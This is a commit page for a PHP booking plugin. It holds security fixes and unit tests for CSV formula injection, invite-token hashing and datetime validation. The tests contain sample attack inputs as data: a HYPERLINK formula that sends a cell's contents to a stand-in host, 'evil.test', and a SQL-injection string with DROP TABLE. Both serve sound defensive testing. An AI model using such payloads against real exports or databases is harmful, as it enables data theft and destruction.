Security fixes: CSV injection, policy body output, invite hashing, slot datetimes
CI / No Debug Code (pull_request) Successful in 3s
CI / Tests (PHP 8.1) (pull_request) Successful in 43s
CI / Tests (PHP 8.3) (pull_request) Successful in 49s
CI / Tests (PHP 8.2) (pull_request) Successful in 59s
CI / Coding Standards (pull_request) Successful in 1m11s
CI / PHPStan (pull_request) Successful in 1m20s
CI / Build Plugin Zip (pull_request) Has been skipped
CI / No Debug Code (pull_request) Successful in 3s
CI / Tests (PHP 8.1) (pull_request) Successful in 43s
CI / Tests (PHP 8.3) (pull_request) Successful in 49s
CI / Tests (PHP 8.2) (pull_request) Successful in 59s
CI / Coding Standards (pull_request) Successful in 1m11s
CI / PHPStan (pull_request) Successful in 1m20s
CI / Build Plugin Zip (pull_request) Has been skipped
Four fixes from a security review pass: - Neutralise CSV formula injection in the payments export: fields with a leading =, +, -, @, tab, or CR (e.g. a hostile student display name) are apostrophe-prefixed in PaymentReport::csvLine() so they open as text in Excel/Google Sheets. Fixes #39. - Sanitise policy bodies with wp_kses_post at output in PolicyEndpoint::index() (the booking JS renders that HTML raw), so a future write path that forgets kses can never become stored XSS. Fixes #40. - Store invite tokens hashed (SHA-256) at rest: a database leak can no longer redeem pending invites. The registration link is shown once, at creation; the pending list shows email/invited date; lookups hash the submitted token. Existing plaintext pending invites must be re-issued. Fixes #41. - Validate availability slot datetimes on both creation paths (REST and admin form) via AvailabilitySlot::normalizeDateTime(): canonical and datetime-local forms normalise to Y-m-d H:i:s, garbage and end <= start are rejected (REST 400) instead of reaching the DATETIME column or throwing inside the weekly-series date arithmetic. Fixes #42. composer test (204 tests, 594 assertions), PHPStan L6, and PHPCS all green. Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
This commit is contained in:
@@ -95,6 +95,16 @@ class InviteTest extends TestCase
|
||||
self::assertFalse($invite->isAcceptable('2026-06-02 09:00:00'));
|
||||
}
|
||||
|
||||
public function testHashTokenIsDeterministicSha256(): void
|
||||
{
|
||||
$hash = Invite::hashToken('raw-token');
|
||||
|
||||
self::assertSame(hash('sha256', 'raw-token'), $hash);
|
||||
self::assertSame($hash, Invite::hashToken('raw-token'));
|
||||
self::assertNotSame($hash, Invite::hashToken('other-token'));
|
||||
self::assertSame(64, strlen($hash));
|
||||
}
|
||||
|
||||
public function testToArrayContainsExpectedKeys(): void
|
||||
{
|
||||
$arr = (new Invite('a@b.test', 'tok', id: 1))->toArray();
|
||||
|
||||
@@ -64,6 +64,26 @@ class AvailabilitySlotTest extends TestCase
|
||||
self::assertTrue($slot->isBooked);
|
||||
}
|
||||
|
||||
public function testNormalizeDateTimeAcceptsCanonicalAndDatetimeLocalForms(): void
|
||||
{
|
||||
self::assertSame('2026-04-01 09:00:00', AvailabilitySlot::normalizeDateTime('2026-04-01 09:00:00'));
|
||||
self::assertSame('2026-04-01 09:00:00', AvailabilitySlot::normalizeDateTime('2026-04-01 09:00'));
|
||||
self::assertSame('2026-04-01 09:00:00', AvailabilitySlot::normalizeDateTime('2026-04-01T09:00'));
|
||||
self::assertSame('2026-04-01 09:00:30', AvailabilitySlot::normalizeDateTime('2026-04-01T09:00:30'));
|
||||
}
|
||||
|
||||
public function testNormalizeDateTimeRejectsGarbageAndImpossibleDates(): void
|
||||
{
|
||||
self::assertNull(AvailabilitySlot::normalizeDateTime(''));
|
||||
self::assertNull(AvailabilitySlot::normalizeDateTime('not a date'));
|
||||
self::assertNull(AvailabilitySlot::normalizeDateTime('next tuesday'));
|
||||
self::assertNull(AvailabilitySlot::normalizeDateTime('2026-04-01'));
|
||||
self::assertNull(AvailabilitySlot::normalizeDateTime('2026-13-01 09:00:00'));
|
||||
self::assertNull(AvailabilitySlot::normalizeDateTime('2026-02-30 09:00:00'));
|
||||
self::assertNull(AvailabilitySlot::normalizeDateTime('2026-04-01 25:00:00'));
|
||||
self::assertNull(AvailabilitySlot::normalizeDateTime("2026-04-01 09:00:00'); DROP TABLE x;--"));
|
||||
}
|
||||
|
||||
public function testToArrayContainsExpectedKeys(): void
|
||||
{
|
||||
$slot = new AvailabilitySlot(1, '2026-04-01 09:00:00', '2026-04-01 10:00:00', 30, 8, false, null, 10);
|
||||
|
||||
@@ -80,4 +80,22 @@ class PaymentReportTest extends TestCase
|
||||
|
||||
self::assertStringContainsString('"Ada ""The Great"""', $csv);
|
||||
}
|
||||
|
||||
public function testCsvNeutralisesFormulaInjectionInNames(): void
|
||||
{
|
||||
$rows = $this->rows();
|
||||
$rows[0]['student'] = '=HYPERLINK("https://evil.test/?"&A1,"total")';
|
||||
$rows[0]['instructor'] = '@SUM(A1)';
|
||||
$rows[1]['student'] = "+1+2";
|
||||
$rows[1]['instructor'] = "\tcmd";
|
||||
$csv = (new PaymentReport($rows))->toCsv();
|
||||
|
||||
self::assertStringContainsString('"\'=HYPERLINK(""https://evil.test/?""&A1,""total"")"', $csv);
|
||||
self::assertStringContainsString('"\'@SUM(A1)"', $csv);
|
||||
self::assertStringContainsString('"\'+1+2"', $csv);
|
||||
self::assertStringContainsString("\"'\tcmd\"", $csv);
|
||||
// Safe fields are untouched.
|
||||
self::assertStringContainsString('"2026-06-02"', $csv);
|
||||
self::assertStringContainsString('"100.00"', $csv);
|
||||
}
|
||||
}
|
||||
|
||||
Reference in New Issue
Block a user